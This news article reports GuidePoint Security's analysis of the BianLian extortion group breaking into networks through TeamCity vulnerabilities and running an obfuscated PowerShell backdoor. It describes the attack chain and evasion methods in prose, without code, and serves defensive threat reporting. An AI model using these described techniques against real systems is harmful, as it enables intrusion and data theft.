The extortion group has rewritten its Go-based backdoor to use TeamCity as an initial access vector. Credit: Serg001 / Shutterstock The BianLian extortion group was recently seen exploiting vulnerabilities in the TeamCity continuous integration server for initial access into networks. In the latest attacks the group also deployed a previously unknown backdoor written in PowerShell that seems to be a reimplementation of their older Golang backdoor. “As we have seen throughout 2023 and into 2024, BianLian continues to prove how they can adapt to a changing environment, especially in regards to the exploitation of emerging vulnerabilities,” researchers from GuidePoint Security said in a new report. BianLian is a ransomware group that emerged in 2022 and has primarily targeted organizations from healthcare, manufacturing, professional, and legal services sectors from the US and Europe. The group originally used double extortion tactics, but it switched to operations that involve only data leak extortion after researchers released a decryptor for its file encrypting program. TeamCity as initial access vector According to an analysis by researchers at Palo Alto Networks, BianLian has consistently been in the top 10 data extortion groups with new victims being posted on its leak site every week. The group has used various methods of gaining initial access to networks including stolen Remote Desktop Protocol (RDP) credentials, exploiting known vulnerabilities such as ProxyShell and targeting VPN providers. During a recent investigation in a customer environment, GuidePoint’s incident response team determined that BianLian attackers broke in by exploiting a vulnerability in TeamCity, a commercial CI/CD tool developed by JetBrains that’s used to automate the building and testing of software code. Because the logs were missing from the server, the GuidePoint researchers didn’t manage to determine if the vulnerability was one of the two critical ones patched by JetBrains last week (CVE-2024-27198) or an older one patched last year (CVE-2023-42793). What’s clear is that the exploit allowed the attackers to create new users in TeamCity and execute malicious commands on the underlying system with the privileges of TeamCity’s service account. Native Windows commands were then used to perform additional reconnaissance and discover additional software build servers on the network that could be targeted. “The threat actor leveraged two files, winpty-agent.exe and winpty.dll to the build servers, which are legitimate files for winpty used to create an interface to run Windows commands,” the researchers said. “The threat actor used winpty-agent.exe on the build servers to remotely run commands from the exploited TeamCity server and leveraged BITSAdmin to deploy additional tools, including a malicious PowerShell script, web.ps1, to the server.” Their attempts to dump credentials from the Windows Security Accounts Manager (SAM) was flagged by the endpoint security monitoring solution and prompted an investigation by incident responders. The investigation revealed that before deploying the PowerShell script, the attackers tried to deploy several DLLs that were quarantined by the local antivirus because they matched Win64/BianDoor.D. This is a detection signature for the group’s known backdoor written in the Go programming language. PowerShell reimplementation of the BianLian backdoor The PowerShell script was highly obfuscated, but the researchers managed to deobfuscate it and analyze its contents. The script had two main functions: One called cakes that implemented a mechanism for connecting to a command-and-control server using SSL streams and TCP sockets and another function called cookies that implemented the rest of the backdoor execution and capabilities. “Perhaps the most interesting component of this whole backdoor was the innovative use of the Runspace Pool in conjunction with the .NET PowerShell.Create() method to invoke a ScriptBlock with asynchronous capabilities, all while leveraging an SSL stream to pass data between the C2 server and the infected system,” the researchers said. Most malicious PowerShell scripts rely on the Invoke-Command or Invoke-Expression PowerShell cmdlets to execute commands or code on the system. By avoiding these well-known techniques BianLian’s script is more likely to avoid being flagged by security products. The Runspace Pool feature is also a more performant way to execute commands asynchronously. BianLian’s Go backdoor uses digital certificates for authenticating the C2 server and this behavior is replicated in the PowerShell script. Furthermore, the IP address the script connected to was already flagged as a known C2 server for BianLian’s GO backdoor, reinforcing the attribution to this group. “Based on these findings of shared infrastructure and AV detections, GRIT assesses with a high confidence that the analyzed PowerShell script is a PowerShell implementation of the BianLian Go backdoor,” the GuidePoint researchers said. Related content news AT&T suffers critical breach impacting 73 million customers Data released on the dark web impacts 7.6 million existing account holders and 65.4 million past subscribers. By Shweta Sharma 01 Apr 2024 4 mins Data Breach feature Recruit for diversity: Practical ways to remove bias from the hiring process Changing the wording on job descriptions and introducing a diverse hiring panel are some of the ways to remove bias when hiring cybersecurity professionals. By Aimee Chanthadavong 01 Apr 2024 8 mins Careers feature The CSO guide to top security conferences Tracking postponements, cancellations, and conferences gone virtual — CSO Online’s calendar of upcoming security conferences makes it easy to find the events that matter the most to you. By CSO Staff 01 Apr 2024 17 mins Technology Industry IT Skills Events news Top cybersecurity product news of the week New product and service announcements from Bedrock Security, GitGuardian, Legit Security, Nametag, and Cybereason and Observe By CSO staff 29 Mar 2024 70 mins Generative AI Security PODCASTS VIDEOS RESOURCES EVENTS SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe